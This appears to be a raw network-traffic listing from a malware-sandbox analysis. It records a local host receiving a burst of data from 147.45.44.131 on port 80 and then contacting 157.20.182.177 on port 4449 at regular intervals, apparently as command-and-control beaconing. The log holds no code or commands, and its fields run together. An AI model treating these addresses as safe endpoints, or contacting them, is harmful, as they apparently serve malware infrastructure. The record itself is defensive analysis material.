                                                                              Jan 1, 2025 08:54:07.835933924 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836117029 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836127996 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836138964 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836149931 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836165905 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836204052 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836205006 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836215019 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836226940 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836236000 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836245060 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836277008 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836435080 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836446047 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836457014 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836467028 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836477995 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836488008 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836488962 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836499929 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836508989 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836532116 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836561918 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836678982 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836688995 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836711884 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836714029 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836719990 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836721897 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836723089 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836724043 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836729050 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.836776972 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.836812019 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.870316982 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.870357037 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.870368004 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.870387077 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.870413065 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.870430946 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.870443106 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.870455980 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.870466948 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.870481968 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.870501995 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.870580912 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.910727978 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.917287111 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917304993 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917318106 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917351007 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.917427063 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917448044 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917462111 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917474985 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917485952 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917494059 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.917504072 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.917547941 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917548895 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.917629957 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917643070 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917678118 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.917733908 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917746067 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917757034 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917768002 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.917797089 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.917833090 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.917999029 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918020964 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918034077 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918045044 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918054104 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918056965 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918067932 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918080091 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918092012 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918095112 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918102980 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918139935 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918160915 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918359041 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918370962 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918385983 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918397903 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918409109 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918421030 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918421030 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918450117 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918467045 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918519020 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918587923 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918601036 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918611050 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918622971 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918632030 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918633938 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918644905 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.918667078 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918701887 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.918997049 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919008970 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919020891 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919033051 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919044018 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919049978 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919055939 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919066906 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919075966 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919079065 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919089079 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919110060 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919142962 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919328928 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919461012 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919473886 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919485092 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919497013 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919512033 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919517994 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919523001 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919534922 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919545889 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919553041 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919557095 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919569016 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919570923 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919579983 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919584990 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919626951 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.919940948 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919950962 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919961929 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919972897 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919982910 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.919992924 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.920001030 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.920003891 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.920015097 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.920027018 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.920047045 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.920072079 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:07.928910971 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.928924084 CET8049699147.45.44.131192.168.2.7
                                                                              Jan 1, 2025 08:54:07.928987026 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:08.018151999 CET4969980192.168.2.7147.45.44.131
                                                                              Jan 1, 2025 08:54:10.446878910 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:10.451698065 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:10.455009937 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:10.470591068 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:10.475359917 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:11.070760012 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:11.076884985 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:11.081676960 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:11.257189989 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:11.301357985 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:13.477516890 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:13.482290983 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:13.482480049 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:13.487323046 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:26.146716118 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:26.151566029 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:26.151618958 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:26.156483889 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:26.462924957 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:26.504586935 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:26.583492994 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:26.591455936 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:26.596330881 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:26.596620083 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:26.601433992 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:38.837382078 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:38.842323065 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:38.842398882 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:38.847242117 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:39.128669024 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:39.176573992 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:39.258599043 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:39.288219929 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:39.293149948 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:39.293234110 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:39.298068047 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:51.505290985 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:51.510288954 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:51.510386944 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:51.515168905 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:51.803018093 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:51.848438025 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:51.936690092 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:51.938517094 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:51.943289042 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:54:51.943339109 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:54:51.948106050 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:04.177046061 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:04.181967974 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:04.182044983 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:04.186891079 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:04.474021912 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:04.520368099 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:04.602538109 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:04.604340076 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:04.609108925 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:04.609175920 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:04.614000082 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:16.849318027 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:16.854250908 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:16.854310989 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:16.859082937 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:17.144833088 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:17.192310095 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:17.274590015 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:17.283526897 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:17.288398027 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:17.288481951 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:17.293250084 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:17.949126005 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:17.953927040 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:17.953993082 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:17.958815098 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:18.256079912 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:18.301839113 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:18.386581898 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:18.388317108 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:18.393198013 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:18.393300056 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:18.398192883 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:30.617367029 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:30.622354984 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:30.625399113 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:30.630239010 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:30.910026073 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:30.957983017 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:31.038674116 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:31.041434050 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:31.046246052 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:31.046298027 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:31.051146984 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:34.411683083 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:34.416604042 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:34.416673899 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:34.421480894 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:34.706799030 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:34.754873991 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:34.835062027 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:34.879900932 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:34.929284096 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:34.934124947 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:34.934185982 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:34.938987017 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:47.083780050 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:47.088773012 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:47.088831902 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:47.093653917 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:47.381264925 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:47.426809072 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:47.512203932 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:47.514512062 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:47.519310951 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:47.519366026 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:47.524224997 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:51.286833048 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:51.291738987 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:51.291795015 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:51.296629906 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:51.581789017 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:51.629951954 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:51.716222048 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:51.717751980 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:51.722527981 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:55:51.722692966 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:55:51.727525949 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:03.958543062 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:03.963522911 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:03.963594913 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:03.968384027 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:04.263365984 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:04.319224119 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:04.390716076 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:04.395219088 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:04.400060892 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:04.400324106 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:04.405148983 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:15.818900108 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:15.824501038 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:15.824558973 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:15.830012083 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:16.113269091 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:16.163238049 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:16.242641926 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:16.247236013 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:16.252067089 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:16.259247065 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:16.264056921 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:17.661926031 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:17.667068958 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:17.667152882 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:17.671927929 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:17.957170963 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:18.005095959 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:18.091857910 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:18.097280979 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:18.102174997 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:18.102303982 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:18.107074976 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:24.771258116 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:24.776525974 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:24.779308081 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:24.784132957 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:25.066971064 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:25.114521027 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:25.194586039 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:25.196825981 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:25.201651096 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:25.201704979 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:25.206537008 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:37.021277905 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:37.026273012 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:37.026346922 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:37.031146049 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:37.316961050 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:37.364547014 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:37.450591087 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:37.452488899 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:37.457290888 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:37.457341909 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:37.462503910 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:49.693147898 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:49.698216915 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:49.698297024 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:49.703085899 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:49.988147020 CET444949701157.20.182.177192.168.2.7
